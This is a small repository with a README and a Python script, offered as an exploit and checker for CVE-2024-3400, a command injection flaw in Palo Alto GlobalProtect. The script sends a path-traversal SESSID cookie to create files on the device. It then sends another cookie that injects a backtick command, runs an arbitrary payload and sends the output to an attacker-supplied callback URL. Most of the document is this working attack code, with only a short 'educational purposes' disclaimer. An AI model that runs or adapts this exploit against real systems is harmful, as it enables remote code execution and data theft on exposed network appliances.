├── README.md └── exploit.py /README.md: -------------------------------------------------------------------------------- 1 | # cve-2024-3400 2 | Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation 3 | 4 | ```bash 5 | usage: cve-2024-3400.py [-h] {exploit,check} ... 6 | 7 | CVE-2024-3400 - Palo Alto OS Command Injection 8 | 9 | positional arguments: 10 | {exploit,check} Available modules 11 | exploit Exploit module of script 12 | check Vulnerability check module of script 13 | 14 | options: 15 | -h, --help show this help message and exit 16 | ``` 17 | 18 | # Disclaimer 19 | Use at your own risk. This was created for educational purposes only. The author is not liable for any action performed by a third-party or how this script may be used. 20 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Author: Kr0ff 3 | 4 | import sys 5 | 6 | try: 7 | import argparse 8 | import requests 9 | except ImportError: 10 | print("Missing dependencies, either requests or argparse not installed") 11 | sys.exit(2) 12 | 13 | # https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis 14 | # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ 15 | 16 | def check_vuln(target: str, file: str) -> bool: 17 | ret = False 18 | 19 | uri = "/ssl-vpn/hipreport.esp" 20 | 21 | s = requests.Session() 22 | r = "" 23 | 24 | headers = { 25 | "User-Agent" : \ 26 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 27 | "Content-Type": "application/x-www-form-urlencoded", 28 | "Cookie": \ 29 | f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}" 30 | } 31 | 32 | headers_noCookie = { 33 | "User-Agent" : \ 34 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0 35 | } 36 | 37 | if not "http://" or not "https://" in target: 38 | target = "http://" + target 39 | try: 40 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 41 | except requests.exceptions.Timeout or requests.ConnectionError as e: 42 | print(f"Request timed out for \"HTTP\" !{e}") 43 | 44 | print("Trying with \"HTTPS\"...") 45 | 46 | target = "https://" + target 47 | try: 48 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 49 | except requests.exceptions.Timeout or requests.ConnectionError as e: 50 | print(f"Request timed out for \"HTTPS\"") 51 | sys.exit(1) 52 | else: 53 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 54 | 55 | if r.status_code == 200: 56 | r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 ) 57 | if r.status_code == 403: 58 | print("Target vulnerable to CVE-2024-3400") 59 | ret = True 60 | else: 61 | return ret 62 | 63 | return ret 64 | 65 | 66 | 67 | def cmdexec(target: str, callback_url: str, payload: str) -> bool: 68 | ret = False 69 | p = "" 70 | 71 | if " " in payload: 72 | p = payload.replace(" ", "${IFS)") 73 | 74 | uri = "/ssl-vpn/hipreport.esp" 75 | 76 | headers = { 77 | "User-Agent" : \ 78 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 79 | "Content-Type": "application/x-www-form-urlencoded", 80 | "Cookie": \ 81 | f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`" 82 | 83 | } 84 | 85 | s = requests.Session() 86 | r = "" 87 | 88 | if not "http://" or not "https://" in target: 89 | target = "http://" + target 90 | try: 91 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 92 | except requests.exceptions.Timeout or requests.ConnectionError as e: 93 | print(f"Request timed out for \"HTTP\" !{e}") 94 | 95 | print("Trying with \"HTTPS\"...") 96 | 97 | target = "https://" + target 98 | try: 99 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 100 | except requests.exceptions.Timeout or requests.ConnectionError as e: 101 | print(f"Request timed out for \"HTTPS\"") 102 | sys.exit(1) 103 | else: 104 | r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) 105 | 106 | if not "Success" in r.text: 107 | return ret 108 | 109 | else: 110 | ret = True 111 | 112 | return ret 113 | 114 | #Initilize parser for arguments 115 | def argparser(selection=None): 116 | parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' ) 117 | 118 | subparser = parser.add_subparsers( help="Available modules", dest="module") 119 | 120 | exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script") 121 | exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True ) 122 | exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True ) 123 | exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True ) 124 | #--------------------------------------- 125 | check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" ) 126 | check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True ) 127 | check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True ) 128 | 129 | args = parser.parse_args(selection) 130 | args = parser.parse_args(args=None if sys.argv[1:] else ["-h"]) 131 | 132 | if args.module == "exploit": 133 | cmdexec(args.target, args.callbackurl, args.payload) 134 | 135 | if args.module == "check": 136 | check_vuln(args.target, args.filename) 137 | 138 | if __name__ == "__main__": 139 | argparser() 140 | print("Finished !") 141 | --------------------------------------------------------------------------------